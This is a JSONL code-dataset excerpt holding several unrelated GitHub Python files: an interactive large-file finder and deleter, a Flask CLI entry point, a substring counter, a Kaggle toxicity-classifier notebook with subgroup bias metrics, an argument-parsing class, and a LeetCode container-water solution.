directoriesInPath = []\n\n try:\n for item in os.scandir(path=path):\n if os.path.isfile(item.path):\n filesInPath[item.path] = item.stat().st_size\n\n elif os.path.isdir(item.path):\n directoriesInPath.append(item.path)\n\n except Exception as ex:\n if showPathErrors == True:\n print(f\"{type(ex).__name__}: {path}\")\n\n return filesInPath, directoriesInPath\n\ndef addFiles(fileDict):\n global intervalCounter\n\n for file, size in fileDict.items():\n if size >= minFileSize and size <= maxFilesize:\n allFiles[file] = size\n\n if showIntervalPrints == True and intervalCounter == interval:\n intervalCounter = 0\n\n if humanReadableOutput == True:\n intervalPrintSize = makeHumanReadable(size)\n else:\n intervalPrintSize = size\n\n print(f\"{file}: {intervalPrintSize}\")\n\n elif showIntervalPrints == True:\n intervalCounter = intervalCounter + 1\n\ndef makeHumanReadable(size):\n count = 0\n newSize = size\n\n while newSize >= 1024:\n newSize = newSize / 1024\n count = count + 1\n newSize = round(newSize, 2)\n\n return f\"{newSize} {sizeNames[count]}\"\n\ndef clear():\n if os.name == \"posix\":\n os.system(\"clear\")\n else:\n os.system(\"cls\")\n\n# Main functions\ndef crawl(path):\n filesInPath, directoriesInPath = getItemsInPath(path)\n\n addFiles(filesInPath)\n\n for directory in directoriesInPath:\n ignoreDirectory = False\n\n for item in dirsToIgnore:\n if item == directory:\n ignoreDirectory = True\n \n if ignoreDirectory == False:\n crawl(directory)\n\ndef printCurrentRange(minShowedResult, maxShowedResult, rmList, currentSelection):\n clear()\n\n fileLoopCount = 0\n for file, size in sorted(allFiles.items(), reverse=reverseOrder, key=orderValue):\n if fileLoopCount >= minShowedResult and fileLoopCount <= maxShowedResult:\n rmMark = rmList[file]\n\n if humanReadableOutput == True:\n size = makeHumanReadable(size)\n\n if fileLoopCount == currentSelection:\n print(f\"{openTextMarker}[{rmMark}] {file}: {size}{closeTextMarker}\")\n else:\n print(f\"[{rmMark}] {file}: {size}\")\n\n if fileLoopCount == maxShowedResult:\n break\n\n fileLoopCount = fileLoopCount + 1\n\ndef wPressed(currentSelection, minShowedResult, maxShowedResult):\n if currentSelection - 1 < 0:\n return currentSelection, minShowedResult, maxShowedResult\n\n if currentSelection - 1 < minShowedResult:\n minShowedResult = minShowedResult - 1\n maxShowedResult = maxShowedResult - 1\n\n return currentSelection - 1, minShowedResult, maxShowedResult\n\ndef sPressed(currentSelection, minShowedResult, maxShowedResult):\n if currentSelection + 1 > len(allFiles) - 1:\n return currentSelection, minShowedResult, maxShowedResult\n\n if currentSelection + 1 > maxShowedResult:\n maxShowedResult = maxShowedResult + 1\n minShowedResult = minShowedResult + 1\n\n return currentSelection + 1, minShowedResult, maxShowedResult\n\ndef enterPressed(rmList):\n for file, rmMark in rmList.items():\n if rmMark == \"X\":\n try:\n os.remove(file)\n\n except Exception as ex:\n if showRmErrors == True:\n print(f\"{type(ex).__name__}: {file}\")\n\n exit()\n\ndef spacebarPressed(rmList, currentSelection):\n rmLoopCounter = 0\n \n for file, rmMark in rmList.items():\n if rmLoopCounter == currentSelection:\n if rmMark == \"X\":\n rmList[file] = \" \"\n else:\n rmList[file] = \"X\"\n\n rmLoopCounter = rmLoopCounter + 1\n\n return rmList\n\ndef interactiveResults(orderValue):\n minShowedResult = len(allFiles) - lineRange\n maxShowedResult = len(allFiles) - 1\n currentSelection = maxShowedResult\n\n rmList = {}\n for file, _size in sorted(allFiles.items(), reverse=reverseOrder, key=orderValue):\n rmList[file] = \" \"\n \n while True:\n printCurrentRange(minShowedResult, maxShowedResult, rmList, currentSelection)\n print(f\"[{currentSelection} / {len(allFiles) - 1}]\")\n \n returnedKey = waitKey()\n if returnedKey == \"w\":\n currentSelection, minShowedResult, maxShowedResult = wPressed(currentSelection, minShowedResult, maxShowedResult)\n elif returnedKey == \"s\":\n currentSelection, minShowedResult, maxShowedResult = sPressed(currentSelection, minShowedResult, maxShowedResult)\n elif returnedKey == \"\\r\":\n enterPressed(rmList)\n elif returnedKey == \" \":\n rmList = spacebarPressed(rmList, currentSelection)\n elif returnedKey == \"e\":\n exit()\n \ndef printAllResults(orderValue):\n print(\"\\n\", end=\"\")\n \n for file, size in sorted(allFiles.items(), reverse=reverseOrder, key=orderValue):\n if humanReadableOutput == True:\n size = makeHumanReadable(size)\n\n print(f\"{file}: {size}\")\n\n\n# Execution\ncrawl(mainPath)\n\nif len(allFiles) < lineRange:\n lineRange = len(allFiles)\n\nprint(\"Press key to continue... \")\nwaitKey()\n\nif interactive == True:\n interactiveResults(orderValue)\nelse:\n printAllResults(orderValue)","repo_name":"matthias020/FileFinder","sub_path":"FileFinder.py","file_name":"FileFinder.py","file_ext":"py","file_size_in_byte":6780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39605388461","text":"# -*- coding: utf-8 -*-\n# noqa: E402\n\"\"\"\n src.__main__\n ~~~~~~~~~~~~\n Handles arguments from the cli and runs the app.\n\n Functions:\n\n main()\n test()\n\n Misc Variables:\n\n cli\n test_present\n\n\"\"\"\nfrom src import app\nfrom flask.cli import FlaskGroup\nimport os\ntry:\n import pytest\n test_present = True\nexcept ImportError: # pragma: no cover\n test_present = False\n\nos.environ[\"FLASK_APP\"] = \"src.__main__:main()\"\n\ncli = FlaskGroup(app)\n\n\ndef main(*args, **kwargs):\n return app\n\n\n@cli.command()\ndef test():\n \"\"\"Run tests\"\"\"\n if test_present:\n pytest.main([\"--doctest-modules\", \"--junitxml=junit/test-results.xml\"])\n else: # pragma: no cover\n app.logger.error(\"Module PyTest is not installed! Install dev dependencies before testing!\") # noqa: E501\n\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"KnightHacks/hackathon-2021-backend","sub_path":"src/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"13978624774","text":"def count_substring(string, sub_string):\n count = 0 \n sublen = len(sub_string)\n for i in range(len(string)):\n if(string[i:i+sublen] == sub_string):\n count += 1\n return count\n\nif __name__ == '__main__':\n print(\"\\nEnter the string: \")\n string = input().strip()\n print(\"\\nEnter the substring: \")\n sub_string = input().strip()\n \n count = count_substring(string, sub_string)\n print(f\"\\nThe substring `{sub_string}` is repeated {count} times in a given string `{string}`\")","repo_name":"rajureddym/python","sub_path":"coding/Basics/Strings/04-substring_count.py","file_name":"04-substring_count.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71050207611","text":"from __future__ import absolute_import\n\nfrom __future__ import division\n\nfrom __future__ import print_function\n\n\n\n\n\nimport numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\nimport glob\n\n\n\n# Input data files are available in the \"../input/\" directory.\n\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\n\n\nimport os\n\nprint(os.listdir(\"../input\"))\n\nprint(os.listdir(\"../input/jigsaw-toxic-comment-classification-challenge\"))\n\nprint(os.listdir(\"../input/nlpword2vecembeddingspretrained\"))\n\nprint(os.listdir(\"../input/fasttext-wikinews\"))\n\nprint(os.listdir(\"../input/fasttext-crawl-300d-2m\"))\n\nprint(os.listdir(\"../input/glove-global-vectors-for-word-representation\"))\n\n\n\n\n\n#print(os.listdir(\"../input/jigsaw-unintended-bias-in-toxicity-classification\"))\n\n\n\n# Any results you write to the current directory are saved as output.\nimport datetime\n\nimport os, codecs\n\nimport pandas as pd\n\nimport numpy as np\n\nimport pkg_resources\n\nimport seaborn as sns\n\nimport time\n\nimport scipy.stats as stats\n\n\n\nfrom sklearn import metrics\n\nfrom sklearn import model_selection\n\n\n\n# Loads word2vec.bin embeddings.\n\nimport gensim\n\nfrom gensim.models import Word2Vec\n\nfrom gensim.utils import simple_preprocess\n\nfrom gensim.models.keyedvectors import KeyedVectors\n\n\n\n# Loads Fastext Embeddings\n\nfrom tqdm import tqdm\n\n\n\nfrom keras.preprocessing.text import Tokenizer\n\nfrom keras.utils import to_categorical\n\nfrom keras.preprocessing.sequence import pad_sequences\n\nfrom keras.layers import Embedding\n\nfrom keras.layers import Input\n\nfrom keras.layers import Conv1D\n\nfrom keras.layers import MaxPooling1D\n\nfrom keras.layers import Flatten\n\nfrom keras.layers import Dropout\n\nfrom keras.layers import Dense\n\nfrom keras.optimizers import RMSprop\n\nfrom keras.models import Model\n\nfrom keras.models import load_model\ntrain = pd.read_csv('../input/jigsaw-unintended-bias-in-toxicity-classification/train.csv')\n\n\n\n# Make sure all comment_text values are strings\n\ntrain['comment_text'] = train['comment_text'].astype(str) \n\n\n\n# List all identities\n\nidentity_columns = [\n\n 'male', 'female', 'homosexual_gay_or_lesbian', 'christian', 'jewish',\n\n 'muslim', 'black', 'white', 'psychiatric_or_mental_illness']\n\n\n\n# Convert taget and identity columns to booleans\n\ndef convert_to_bool(df, col_name):\n\n df[col_name] = np.where(df[col_name] >= 0.5, True, False)\n\n \n\ndef convert_dataframe_to_bool(df):\n\n bool_df = df.copy()\n\n for col in ['target'] + identity_columns:\n\n convert_to_bool(bool_df, col)\n\n return bool_df\n\n\n\ntrain = convert_dataframe_to_bool(train)\n\n#train.head(5)\n# #####################\n\n# ADDS WEIGHTS TO LABELS\n\n# #####################\n\n# x_train = preprocess(train['comment_text'])\n\n# weights = np.ones((len(x_train),)) / 4\n\n# # Subgroup\n\n# weights += (train[identity_columns].fillna(0).values>=0.5).sum(axis=1).astype(bool).astype(np.int) / 4\n\n# # Background Positive, Subgroup Negative\n\n# weights += (( (train['target'].values>=0.5).astype(bool).astype(np.int) +\n\n# (train[identity_columns].fillna(0).values<0.5).sum(axis=1).astype(bool).astype(np.int) ) > 1 ).astype(bool).astype(np.int) / 4\n\n# # Background Negative, Subgroup Positive\n\n# weights += (( (train['target'].values<0.5).astype(bool).astype(np.int) +\n\n# (train[identity_columns].fillna(0).values>=0.5).sum(axis=1).astype(bool).astype(np.int) ) > 1 ).astype(bool).astype(np.int) / 4\n\n# loss_weight = 1.0 / weights.mean()\n\n\n\n# y_train = np.vstack([(train['target'].values>=0.5).astype(np.int),weights]).T\n\n# y_aux_train = train[['target', 'severe_toxicity', 'obscene', 'identity_attack', 'insult', 'threat']].values\n\n# #####################\n\n# END OF WEIGHTS TO LABELS\n\n# #####################\ntrain_df, validate_df = model_selection.train_test_split(train, test_size=0.2)\n\nprint('%d train comments, %d validate comments' % (len(train_df), len(validate_df)))\n\ntrain_df.head()\n# #####################\n\n# Data Augmentation and Weights\n\n# #####################\n\n# Expands data set in the following ways:\n\n# NOTE: comment out to use one at a time.\n\n\n\n# #######################################\n\n# 1.) Adds previous competitions data to the training set. (done - tested)\n\n# #######################################\n\n# train_old = pd.read_csv('../input/jigsaw-toxic-comment-classification-challenge/train.csv')\n\n\n\n# # Obtains columns\n\n# id_col = train_old['id'].tolist()\n\n# toxic_col = train_old['toxic'].tolist()\n\n# comment_col = train_old['comment_text'].tolist()\n\n\n\n# # creates frame (values already bool)\n\n# old_lists = list(zip(id_col, toxic_col, comment_col))\n\n# old_frame = pd.DataFrame(old_lists, columns =['id', 'target', 'comment_text']) \n\n# # old_frame.head(10)\n\n\n\n# # appends frame\n\n# train_df = train_df.append(old_frame, ignore_index=True, sort=False)\n\n# train_df.fillna(0, inplace=True)\n\n# #train.tail(10)\n\n\n\n# #######################################\n\n# end\n\n# #######################################\n\n\n\n# #######################################\n\n# 2.) Removes subgroup positives. (tested)\n\n# #######################################\n\n# toxic = train_df.loc[train_df['target'] >= 0.5]\n\n\n\n# # obtains toxic subgroups\n\n# sub_pos_df = pd.DataFrame()\n\n# for ident in identity_columns:\n\n# sub_pos_df = pd.concat([ sub_pos_df, toxic.loc[toxic[ident] >= 0.5] ], axis=0)\n\n \n\n# # removes from train_df based on columns.\n\n# train_df = train_df.drop(sub_pos_df.index.values)\n\n\n\n# # # Sanity check\n\n# print('# Toxic Identities')\n\n# toxic = train_df[train_df['target'] >= 0.5]\n\n# for ident in identity_columns:\n\n# print(ident, toxic.loc[toxic[ident] >= 0.5].shape[0])\n\n# #######################################\n\n# end\n\n# #######################################\n\n\n\n# #######################################\n\n# 3.) Balance subgroup negatives via oversampling. (test)\n\n# #######################################\n\nnon_toxic = train_df[train_df['target'] < 0.5]\n\n\n\n# Finds the maximum subgroup negative group.\n\nmax_val = 0\n\nfor ident in identity_columns:\n\n val = non_toxic.loc[non_toxic[ident] >= 0.5].shape[0]\n\n if val >= max_val:\n\n max_val = val\n\nprint('balancing subgroup negatives to max value: ', max_val)\n\nprint('starting... ', train_df.shape[0])\n\n\n\n# Over samples data and appends data.\n\na = 0\n\nfor ident in identity_columns:\n\n # Creates local, deep copy for replacing.\n\n ident_df = non_toxic[non_toxic[ident] >= 0.5].copy(deep=True)\n\n val = max_val - ident_df.shape[0]\n\n ident_oversampled = ident_df.sample(n=val, replace=True)\n\n train_df = pd.concat([train_df, ident_oversampled], axis=0)\n\n a = a + ident_oversampled.shape[0]\n\n print('size : ', ident_df.shape[0])\n\n print('adding : ', ident_oversampled.shape[0])\n\n print('total : ', train_df.shape[0], '\\n')\n\n\n\n# Shuffles data\n\ntrain_df = train_df.sample(frac=1)\n\n \n\n# Sanity check\n\nprint('added... ', a)\n\nprint('final... ', train_df.shape[0])\n\nnon_toxic = train_df[train_df['target'] < 0.5]\n\nfor ident in identity_columns:\n\n print(ident, non_toxic.loc[non_toxic[ident] >= 0.5].shape[0])\n\n# #######################################\n\n# end\n\n# #######################################\n\n\n\n# #######################################\n\n# 4.) Oversample subgroup negatives (extreme). (todo)\n\n# #######################################\n\n# non_toxic = train_df[train_df['target'] < 0.5]\n\n\n\n# # Over samples data and appends data.\n\n# max_val = 100000\n\n# a = 0\n\n# for ident in identity_columns:\n\n# # Creates local, deep copy for replacing.\n\n# ident_df = non_toxic[non_toxic[ident] >= 0.5].copy(deep=True)\n\n# val = max_val - ident_df.shape[0]\n\n# ident_oversampled = ident_df.sample(n=val, replace=True)\n\n# train_df = pd.concat([train_df, ident_oversampled], axis=0)\n\n# a = a + ident_oversampled.shape[0]\n\n# print('size : ', ident_df.shape[0])\n\n# print('adding : ', ident_oversampled.shape[0])\n\n# print('total : ', train_df.shape[0], '\\n')\n\n\n\n# # Shuffles data\n\n# train_df = train_df.sample(frac=1)\n\n \n\n# # Sanity check\n\n# print('added... ', a)\n\n# print('final... ', train_df.shape[0])\n\n# non_toxic = train_df[train_df['target'] < 0.5]\n\n# for ident in identity_columns:\n\n# print(ident, non_toxic.loc[non_toxic[ident] >= 0.5].shape[0])\n\n\n\n# #######################################\n\n# end\n\n# #######################################\n\n\n\n# #######################################\n\n# 5.) Over sample subgroup positives (fine-tuned). \n\n# #######################################\n\n\n\n\n\n# #######################################\n\n# end\n\n# #######################################\n# Augment: Remove Subgroup Pos.\n\n# subgroup pos = identity > 0.5 && target > 0.5\n\n# = full data w/o subgroups appended to subgroups non toxic.\n\n\n\n# obtains subgroup negatives.\n\n# s_neg = pd.DataFrame(data=None, columns=train_df.columns, index=train_df.index)\n\n# non_toxic = complete.loc[complete['target'] < 0.5]\n\n# for ident in identity_columns:\n\n# s_neg = s_neg.append(train_df.loc[non_toxic[ident >= 0.5]])\n\n\n\n# # obtain background pos/neg\n\n# background = pd.DataFrame(data=None, columns=train_df.columns, index=train_df.index)\n\n# for ident in identity_columns:\n\n# background = background.append(train_df.loc[train_df[ident < .5]])\n\nMAX_NUM_WORDS = 10000\n\nTOXICITY_COLUMN = 'target'\n\nTEXT_COLUMN = 'comment_text'\n\n\n\n# Create a text tokenizer.\n\ntokenizer = Tokenizer(num_words=MAX_NUM_WORDS)\n\ntokenizer.fit_on_texts(train_df[TEXT_COLUMN])\n\n\n\n# All comments must be truncated or padded to be the same length.\n\nMAX_SEQUENCE_LENGTH = 250\n\ndef pad_text(texts, tokenizer):\n\n return pad_sequences(tokenizer.texts_to_sequences(texts), maxlen=MAX_SEQUENCE_LENGTH)\n# IMPORTANT # ###########################\n\n# Ensure that the desired embedding is loaded and that the correct dimensions are set.\n\n# Different embedding files require various methods to be loaded. Ensure correct loading is uncommented.\n\n\n\nEMBEDDINGS_PATH = '../input/fasttext-wikinews/wiki-news-300d-1M.vec'\n\n#EMBEDDINGS_PATH = '../input/fasttext-crawl-300d-2m/crawl-300d-2M.vec'\n\n#EMBEDDINGS_PATH = '../input/nlpword2vecembeddingspretrained/glove.6B.300d.txt'\n\n#EMBEDDINGS_PATH = '../input/nlpword2vecembeddingspretrained/glove.6B.200d.txt'\n\n#EMBEDDINGS_PATH = '../input/glove-global-vectors-for-word-representation/glove.twitter.27B.200d.txt'\n\nEMBEDDINGS_DIMENSION = 300\n\n# #######################################\n\n\n\nDROPOUT_RATE = 0.3\n\nLEARNING_RATE = 0.00005\n\nNUM_EPOCHS = 10\n\nBATCH_SIZE = 128\n\n\n\ndef train_model(train_df, validate_df, tokenizer):\n\n # Prepare data\n\n train_text = pad_text(train_df[TEXT_COLUMN], tokenizer)\n\n train_labels = to_categorical(train_df[TOXICITY_COLUMN])\n\n validate_text = pad_text(validate_df[TEXT_COLUMN], tokenizer)\n\n validate_labels = to_categorical(validate_df[TOXICITY_COLUMN])\n\n \n\n# #####################\n\n# LOAD EMBEDDINGS\n\n# #####################\n\n# Commet out undesired embeddings. Only one embedding may be loaded at a time (with this model).\n\n embeddings_index = {}\n\n embedding_matrix = np.zeros((len(tokenizer.word_index) + 1,\n\n EMBEDDINGS_DIMENSION))\n\n\n\n# FASTEXT EMBEDDINGS ############################ (.vec)\n\n print('Loading word embeddings.')\n\n f = codecs.open(EMBEDDINGS_PATH, encoding='utf-8')\n\n for line in tqdm(f):\n\n values = line.rstrip().rsplit(' ')\n\n word = values[0]\n\n coefs = np.asarray(values[1:], dtype='float32')\n\n embeddings_index[word] = coefs\n\n f.close()\n\n print('Preparing embedding matrix.')\n\n words_not_found = []\n\n for word, i in tokenizer.word_index.items():\n\n embedding_vector = embeddings_index.get(word)\n\n if (embedding_vector is not None) and len(embedding_vector) > 0:\n\n # words not found in embedding index will be all-zeros.\n\n embedding_matrix[i] = embedding_vector\n\n else:\n\n words_not_found.append(word)\n\n print('number of null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0))\n\n# #################################################\n\n\n\n# GLOVE EMBEDDINGS # ############################## (.txt)\n\n# print('Loading Glove embeddings.')\n\n# with open(EMBEDDINGS_PATH) as f:\n\n# for line in f:\n\n# values = line.split()\n\n# word = values[0]\n\n# coefs = np.asarray(values[1:], dtype='float32')\n\n# embeddings_index[word] = coefs\n\n# print('Preparing embedding matrix.')\n\n# num_words_in_embedding = 0\n\n# for word, i in tokenizer.word_index.items():\n\n# embedding_vector = embeddings_index.get(word)\n\n# if embedding_vector is not None:\n\n# num_words_in_embedding += 1\n\n# # words not found in embedding index will be all-zeros.\n\n# embedding_matrix[i] = embedding_vector\n\n# # ################################################\n\n\n\n# WORD2VEC EMBEDDINGS ############################ (.bin)\n\n# word_vectors = KeyedVectors.load_word2vec_format(EMBEDDINGS_PATH, binary=True)\n\n# num_words_in_embedding = 0\n\n# for word, i in tokenizer.word_index.items():\n\n# if i >= MAX_NUM_WORDS:\n\n# continue\n\n# try:\n\n# embedding_vector = word_vectors[word]\n\n# embedding_matrix[i] = embedding_vector\n\n# except KeyError:\n\n# embedding_matrix[i] = np.zeros((EMBEDDINGS_DIMENSION))\n\n# ############################################### \n\n# #####################\n\n# END OF LOAD EMBEDDINGS\n\n# ##################### \n\n \n\n\n\n # Create model layers.\n\n def get_convolutional_neural_net_layers():\n\n \"\"\"Returns (input_layer, output_layer)\"\"\"\n\n sequence_input = Input(shape=(MAX_SEQUENCE_LENGTH,), dtype='int32')\n\n \n\n embedding_layer_static = Embedding(len(tokenizer.word_index) + 1,\n\n EMBEDDINGS_DIMENSION,\n\n weights=[embedding_matrix],\n\n input_length=MAX_SEQUENCE_LENGTH,\n\n trainable=False) \n\n \n\n# embedding_layer_non_static = Embedding(len(tokenizer.word_index) + 1,\n\n# EMBEDDINGS_DIMENSION,\n\n# weights=[embedding_matrix],\n\n# input_length=MAX_SEQUENCE_LENGTH,\n\n# trainable=True)\n\n\n\n # Hybrid: Nonstatic and Static\n\n# xs = embedding_layer_static(sequence_input)\n\n# xns = embedding_layer_non_static(sequence_input)\n\n# xs= Conv1D(128, 2, activation='relu', padding='same')(xs)\n\n# xns = Conv1D(128, 2, activation='relu', padding='same')(xns) \n\n# xs = MaxPooling1D(40, padding='same')(xs)\n\n# xns = MaxPooling1D(40, padding='same')(xns)\n\n# xs = Conv1D(128, 3, activation='relu', padding='same')(xs)\n\n# xns = Conv1D(128, 3, activation='relu', padding='same')(xns)\n\n# xs = MaxPooling1D(40, padding='same')(xs)\n\n# xns = MaxPooling1D(40, padding='same')(xns)\n\n# xs = Conv1D(128, 4, activation='relu', padding='same')(xs)\n\n# xns = Conv1D(128, 4, activation='relu', padding='same')(xns)\n\n# xs = MaxPooling1D(40, padding='same')(xs)\n\n# xns = MaxPooling1D(40, padding='same')(xns)\n\n# xs = Conv1D(128, 5, activation='relu', padding='same')(xs)\n\n# xns = Conv1D(128, 5, activation='relu', padding='same')(xns)\n\n# x = Maximum()([xs,xns])\n\n# x = MaxPooling1D(40, padding='same')(x)\n\n# x = Flatten()(x)\n\n# x = Dropout(DROPOUT_RATE)(x)\n\n# x = Dense(128, activation='relu')(x)\n\n# preds = Dense(2, activation='softmax')(x)\n\n # End of Hybrid: Static and Non Static\n\n\n\n # Static\n\n xs = embedding_layer_static(sequence_input)\n\n xs = Conv1D(128, 2, activation='relu', padding='same')(xs) \n\n xs = MaxPooling1D(40, padding='same')(xs)\n\n xs = Conv1D(128, 3, activation='relu', padding='same')(xs)\n\n xs = MaxPooling1D(40, padding='same')(xs)\n\n xs = Conv1D(128, 4, activation='relu', padding='same')(xs)\n\n xs = MaxPooling1D(40, padding='same')(xs)\n\n xs = Conv1D(128, 5, activation='relu', padding='same')(xs)\n\n xs = MaxPooling1D(40, padding='same')(xs)\n\n x = Flatten()(xs)\n\n x = Dropout(DROPOUT_RATE)(x)\n\n x = Dense(128, activation='relu')(x)\n\n preds = Dense(2, activation='softmax')(x)\n\n # End of Static\n\n \n\n # Non Static\n\n# xns = embedding_layer_non_static(sequence_input)\n\n# xns = Conv1D(128, 2, activation='relu', padding='same')(xns) \n\n# xns = MaxPooling1D(40, padding='same')(xns)\n\n# xns = Conv1D(128, 3, activation='relu', padding='same')(xns)\n\n# xns = MaxPooling1D(40, padding='same')(xns)\n\n# xns = Conv1D(128, 4, activation='relu', padding='same')(xns)\n\n# xns = MaxPooling1D(40, padding='same')(xns)\n\n# xns = Conv1D(128, 5, activation='relu', padding='same')(xns)\n\n# xns = MaxPooling1D(40, padding='same')(xns)\n\n# x = Flatten()(xns)\n\n# x = Dropout(DROPOUT_RATE)(x)\n\n# x = Dense(128, activation='relu')(x)\n\n# preds = Dense(2, activation='softmax')(x)\n\n # End of Nonstatic\n\n \n\n return sequence_input, preds\n\n\n\n # Compile model.\n\n print('compiling model')\n\n input_layer, output_layer = get_convolutional_neural_net_layers()\n\n model = Model(input_layer, output_layer)\n\n model.compile(loss='categorical_crossentropy',\n\n optimizer=RMSprop(lr=LEARNING_RATE), \n\n metrics=['acc'])\n\n\n\n # Train model.\n\n print('training model')\n\n model.fit(train_text,\n\n train_labels,\n\n batch_size=BATCH_SIZE,\n\n epochs=NUM_EPOCHS,\n\n validation_data=(validate_text, validate_labels),\n\n verbose=2)\n\n\n\n return model\n\n\n\nmodel = train_model(train_df, validate_df, tokenizer)\nMODEL_NAME = 'my_model'\n\nvalidate_df[MODEL_NAME] = model.predict(pad_text(validate_df[TEXT_COLUMN], tokenizer))[:, 1]\nvalidate_df.head()\nSUBGROUP_AUC = 'subgroup_auc'\n\nBPSN_AUC = 'bpsn_auc' # stands for background positive, subgroup negative\n\nBNSP_AUC = 'bnsp_auc' # stands for background negative, subgroup positive\n\n\n\ndef compute_auc(y_true, y_pred):\n\n try:\n\n return metrics.roc_auc_score(y_true, y_pred)\n\n except ValueError:\n\n return np.nan\n\n\n\ndef compute_subgroup_auc(df, subgroup, label, model_name):\n\n subgroup_examples = df[df[subgroup]]\n\n return compute_auc(subgroup_examples[label], subgroup_examples[model_name])\n\n\n\ndef compute_bpsn_auc(df, subgroup, label, model_name):\n\n \"\"\"Computes the AUC of the within-subgroup negative examples and the background positive examples.\"\"\"\n\n subgroup_negative_examples = df[df[subgroup] & ~df[label]]\n\n non_subgroup_positive_examples = df[~df[subgroup] & df[label]]\n\n examples = subgroup_negative_examples.append(non_subgroup_positive_examples)\n\n return compute_auc(examples[label], examples[model_name])\n\n\n\ndef compute_bnsp_auc(df, subgroup, label, model_name):\n\n \"\"\"Computes the AUC of the within-subgroup positive examples and the background negative examples.\"\"\"\n\n subgroup_positive_examples = df[df[subgroup] & df[label]]\n\n non_subgroup_negative_examples = df[~df[subgroup] & ~df[label]]\n\n examples = subgroup_positive_examples.append(non_subgroup_negative_examples)\n\n return compute_auc(examples[label], examples[model_name])\n\n\n\ndef compute_bias_metrics_for_model(dataset,\n\n subgroups,\n\n model,\n\n label_col,\n\n include_asegs=False):\n\n \"\"\"Computes per-subgroup metrics for all subgroups and one model.\"\"\"\n\n records = []\n\n for subgroup in subgroups:\n\n record = {\n\n 'subgroup': subgroup,\n\n 'subgroup_size': len(dataset[dataset[subgroup]])\n\n }\n\n record[SUBGROUP_AUC] = compute_subgroup_auc(dataset, subgroup, label_col, model)\n\n record[BPSN_AUC] = compute_bpsn_auc(dataset, subgroup, label_col, model)\n\n record[BNSP_AUC] = compute_bnsp_auc(dataset, subgroup, label_col, model)\n\n records.append(record)\n\n return pd.DataFrame(records).sort_values('subgroup_auc', ascending=True)\n\n\n\nbias_metrics_df = compute_bias_metrics_for_model(validate_df, identity_columns, MODEL_NAME, TOXICITY_COLUMN)\n\nbias_metrics_df\ndef calculate_overall_auc(df, model_name):\n\n true_labels = df[TOXICITY_COLUMN]\n\n predicted_labels = df[model_name]\n\n return metrics.roc_auc_score(true_labels, predicted_labels)\n\n\n\ndef power_mean(series, p):\n\n total = sum(np.power(series, p))\n\n return np.power(total / len(series), 1 / p)\n\n\n\ndef get_final_metric(bias_df, overall_auc, POWER=-5, OVERALL_MODEL_WEIGHT=0.25):\n\n bias_score = np.average([\n\n power_mean(bias_df[SUBGROUP_AUC], POWER),\n\n power_mean(bias_df[BPSN_AUC], POWER),\n\n power_mean(bias_df[BNSP_AUC], POWER)\n\n ])\n\n return (OVERALL_MODEL_WEIGHT * overall_auc) + ((1 - OVERALL_MODEL_WEIGHT) * bias_score)\n\n \n\nget_final_metric(bias_metrics_df, calculate_overall_auc(validate_df, MODEL_NAME))\ntest = pd.read_csv('../input/jigsaw-unintended-bias-in-toxicity-classification/test.csv')\n\nsubmission = pd.read_csv('../input/jigsaw-unintended-bias-in-toxicity-classification/sample_submission.csv', index_col='id')\nsubmission['prediction'] = model.predict(pad_text(test[TEXT_COLUMN], tokenizer))[:, 1]\n\nsubmission.to_csv('submission.csv')","repo_name":"aorursy/new-nb-1","sub_path":"austvan_research.py","file_name":"austvan_research.py","file_ext":"py","file_size_in_byte":21676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7831921095","text":"import ast\nfrom doppelkopf.utils.Console import Console\nfrom doppelkopf.programs.Argument import Argument\n\nclass OptionalArgument(Argument):\n def __init__(self, name, expectedType, defaultValue):\n super(OptionalArgument, self).__init__(name, expectedType)\n self.defaultValue = defaultValue\n\n def TryAssign(self, arg: str) ->bool:\n try:\n if self.expectedType is bool:\n if arg == \"True\":\n self.givenValue = True\n elif arg == \"False\":\n self.givenValue = False\n else:\n raise ValueError(\"Illegal argument\")\n elif self.expectedType is list:\n self.givenValue = ast.literal_eval(arg)\n else:\n self.givenValue = self.expectedType(arg)\n except:\n self.UseDefault()\n Console.WriteError(\"Parameter '%s' could not be cast to the expected type %s (got '%s'). Using default %s instead\" % (self.name, str(self.expectedType), arg, str(self.defaultValue)))\n self.isAssigned = True\n return True\n \n def UseDefault(self):\n self.givenValue = self.defaultValue","repo_name":"MalteHargarten/Doppelkopf_MA","sub_path":"src/doppelkopf/programs/OptionalArgument.py","file_name":"OptionalArgument.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11461196388","text":"# -*- coding: utf-8 -*-\n# 给定一个长度为 n 的整数数组height。有n条垂线,第 i 条线的两个端点是(i, 0)和(i, height[i])。\n#\n# 找出其中的两条线,使得它们与x轴共同构成的容器可以容纳最多的水。\n#\n# 返回容器可以储存的最大水量。\n#\n# 说明:你不能倾斜容器。\n# 输入:[1,8,6,2,5,4,8,3,7]\n# 输出:49\n# 解释:图中垂直线代表输入数组 [1,8,6,2,5,4,8,3,7]。在此情况下,容器能够容纳水(表示为蓝色部分)的最大值为 49。\n#\n# 来源:力扣(LeetCode)\n# 链接:https://leetcode.cn/problems/container-with-most-water\nfrom typing import List\n\n\nclass Solution:\n def maxArea(self, height: List[int]) -> int:\n i, j = 0, len(height) - 1\n ans = 0\n while i < j:\n if height[i] < height[j]:\n tmp = height[i] * (j - i)\n i += 1\n if tmp > ans:\n ans = tmp\n else:\n tmp = height[j] * (j - i)\n j -= 1\n if tmp > ans:\n ans = tmp\n return ans\n","repo_name":"lisj1211/Algorithm","sub_path":"LeetCodeHot100/11. 盛最多水的容器.py","file_name":"11. 盛最多水的容器.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} 